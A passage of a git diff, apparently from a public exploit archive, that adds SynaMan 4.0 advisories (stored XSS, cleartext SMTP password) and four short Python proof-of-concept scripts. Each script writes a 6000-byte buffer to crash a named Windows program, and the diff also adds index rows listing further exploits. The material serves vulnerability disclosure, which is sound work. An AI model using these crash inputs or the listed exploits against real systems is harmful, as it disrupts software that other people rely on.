http://web.synametrics.com/SynaMan.htm +# Version: 4.0 build 1488 +# Software Link: http://web.synametrics.com/SynaManDownload.htm +# Tested On: Windows 7 x86 + +Description +----------------------------------------------------------------- +SynaMan 4.0 suffers from Authenticated Cross Site Scripting (XSS) + + +Prerequisites +----------------------------------------------------------------- +Admin access to Synaman web console + +Proof of Concept +----------------------------------------------------------------- +From Configuration > Advanced Configuration > Partial Branding +- Main heading +- Sub heading + +If one were to apply the following XSS payload in either of the fields, alert pop-ups with xss would be present on navigation throughout the web app + + + +While Chrome does block the XSS payload on apply, simply hitting the back button and selecting "Explore" the payload is stored + + +Timeline +--------------------------------------------------------------------- +05-07-18: Vendor notified of vulnerabilities +05-08-18: Vendor responded and will fix +07-25-18: Vendor fixed in new release +09-12-18: Submitted public disclosure \ No newline at end of file diff --git a/exploits/windows/webapps/45387.txt b/exploits/windows/webapps/45387.txt new file mode 100644 index 000000000..399168b6f --- /dev/null +++ b/exploits/windows/webapps/45387.txt @@ -0,0 +1,45 @@ +# Exploit Author: bzyo +# CVE: CVE-2018-10814 +# Twitter: @bzyo_ +# Exploit Title: SynaMan 4.0 - Cleartext password SMTP settings +# Date: 09-12-18 +# Vulnerable Software: SynaMan 4.0 build 1488 +# Vendor Homepage: http://web.synametrics.com/SynaMan.htm +# Version: 4.0 build 1488 +# Software Link: http://web.synametrics.com/SynaManDownload.htm +# Tested On: Windows 7 x86 + +Description +----------------------------------------------------------------- +SynaMan 4.0 suffers from cleartext password storage for SMTP settings which would allow email account compromise + +Prerequisites +----------------------------------------------------------------- +Access to a system running Synaman 4 using a low-privileged user account + +Proof of Concept +----------------------------------------------------------------- +The password for the smtp email account is stored in plaintext in the AppConfig.xml configuration file. This file can be viewed by any local user of the system. + +C:\SynaMan\config>type AppConfig.xml + + + + + + + **truncated** + + + + + + + + +Timeline +--------------------------------------------------------------------- +05-07-18: Vendor notified of vulnerabilities +05-08-18: Vendor responded and will fix +07-25-18: Vendor fixed in new release +09-12-18: Submitted public disclosure \ No newline at end of file diff --git a/exploits/windows_x86/dos/45380.py b/exploits/windows_x86/dos/45380.py new file mode 100755 index 000000000..97e029feb --- /dev/null +++ b/exploits/windows_x86/dos/45380.py @@ -0,0 +1,25 @@ +# Exploit Title: jiNa OCR Image to Text 1.0 - Denial of Service (PoC) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-09-10 +# Software Link: http://www.convertimagetotext.net/downloadsoftware.php +# Tested Version: 1.0 +# Tested on OS: Windows 7 32-bit + +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.png". +# Now start the program. Now when you are inside of the program attempt to convert the file "exploit.png" to pdf. +# Now wait and you will see a crash! + +#!/usr/bin/python + +buffer = "A" * 6000 + +payload = buffer +try: + f=open("exploit.png","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86/dos/45381.py b/exploits/windows_x86/dos/45381.py new file mode 100755 index 000000000..3d02927bd --- /dev/null +++ b/exploits/windows_x86/dos/45381.py @@ -0,0 +1,25 @@ +# Exploit Title: PixGPS 1.1.8 - Denial of Service (PoC) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-09-10 +# Software Link: http://www.br-software.com/pixgps11_setup.exe +# Tested Version: 1.1.8 +# Tested on OS: Windows 7 32-bit +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt". Copy the content from "exploit.txt". +# Now start the program. +# Now when you are inside of the program paste the contents of "exploit.txt" into the field:"Folder with picture files" +# Click the "..." button and you will see a crash! + +#!/usr/bin/python + +buffer = "A" * 6000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86/dos/45382.py b/exploits/windows_x86/dos/45382.py new file mode 100755 index 000000000..df9f91aaa --- /dev/null +++ b/exploits/windows_x86/dos/45382.py @@ -0,0 +1,25 @@ +# Exploit Title: RoboImport 1.2.0.72 - Denial of Service (PoC) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-09-11 +# Software Link: http://www.picajet.com/download/RoboImportInstall.exe +# Tested Version: 1.2.0.72 +# Tested on OS: Windows 7 32-bit +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt". Copy the content from "exploit.txt". +# Now start the program. +# Now paste the contents of "exploit.txt" into the fields:"Registration Name" & "Registration key" +# Click the "Register" button and you will see a crash! + +#!/usr/bin/python + +buffer = "A" * 6000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86/dos/45383.py b/exploits/windows_x86/dos/45383.py new file mode 100755 index 000000000..883cb9661 --- /dev/null +++ b/exploits/windows_x86/dos/45383.py @@ -0,0 +1,25 @@ +# Exploit Title: PicaJet FX 2.6.5 - Denial of Service (PoC) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-09-11 +# Software Link: http://www.picajet.com/download/PicaJetFXInstall.exe +# Tested Version: 2.6.5 +# Tested on OS: Windows 7 32-bit +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt". Copy the content from "exploit.txt". +# Now start the program. When inside the program click "Help" > "Register PicaJet..." +# Now paste the contents of "exploit.txt" into the fields:"Registration Name" & "Registration Key" +# Click the "OK" button and you will see a crash! + +#!/usr/bin/python + +buffer = "A" * 6000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 26463c35f..3eaf91d1c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6096,7 +6096,15 @@ id,file,description,date,author,type,platform,port 45321,exploits/ios/dos/45321.py,"Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC)",2018-09-03,"Luis Martínez",dos,ios, 45324,exploits/windows/dos/45324.py,"Wikipedia 12.0 - Denial of Service (PoC)",2018-09-03,0xB9,dos,windows, 45357,exploits/windows_x86/dos/45357.txt,"Zenmap (Nmap) 7.70 - Denial of Service (PoC)",2018-09-10,"Gionathan Reale",dos,windows_x86, +45380,exploits/windows_x86/dos/45380.py,"jiNa OCR Image to Text 1.0 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows_x86, 45376,exploits/windows_x86/dos/45376.py,"HTML5 Video Player 1.2.5 - Denial of Service (PoC)",2018-09-11,T3jv1l,dos,windows_x86, +45381,exploits/windows_x86/dos/45381.py,"PixGPS 1.1.8 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows_x86, +45382,exploits/windows_x86/dos/45382.py,"RoboImport 1.2.0.72 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows_x86, +45383,exploits/windows_x86/dos/45383.py,"PicaJet FX 2.6.5 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows_x86, +45388,exploits/windows/dos/45388.py,"iCash 7.6.5 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows, +45389,exploits/windows/dos/45389.py,"PDF Explorer 1.5.66.2 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows, +45390,exploits/windows/dos/45390.py,"Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows, +45391,exploits/macos/dos/45391.py,"Apple macOS 10.13.4 - Denial of Service (PoC)",2018-09-12,Sriram,dos,macos, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -39948,3 +39956,10 @@ id,file,description,date,author,type,platform,port 45351,exploits/hardware/webapps/45351.py,"LW-N605R 12.20.2.1486 - Remote Code Execution",2018-09-10,"Nassim Asrir",webapps,hardware, 45361,exploits/linux/webapps/45361.py,"RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution",2018-09-04,"Reigning Shells",webapps,linux, 45375,exploits/php/webapps/45375.txt,"Bayanno Hospital Management System 4.0 - Cross-Site Scripting",2018-09-11,"Gokhan Sagoglu",webapps,php, +45384,exploits/hardware/webapps/45384.py,"CirCarLife SCADA 4.3.0 - Credential Disclosure",2018-09-12,SadFud,webapps,hardware, +45385,exploits/linux/webapps/45385.txt,"Rubedo CMS 3.4.0 - Directory Traversal",2018-09-12,"Marouene Boubakri",webapps,linux, +45386,exploits/windows/webapps/45386.txt,"SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)",2018-09-12,bzyo,webapps,windows, +45387,exploits/windows/webapps/45387.txt,"SynaMan 4.0 build 1488 - SMTP Credential Disclosure",2018-09-12,bzyo,webapps,windows, +45392,exploits/php/webapps/45392.txt,"IBM Identity Governance and Intelligence 5.2.3.2 / 5.2.4 - SQL Injection",2018-09-12,"Mohamed Sayed",webapps,php, +45393,exploits/php/webapps/45393.txt,"MyBB 1.8.17 - Cross-Site Scripting",2018-09-12,0xB9,webapps,php, +45394,exploits/hardware/webapps/45394.py,"LG Smart IP Camera 1508190 - Backup File Download",2018-09-12,"Ege Balci",webapps,hardware,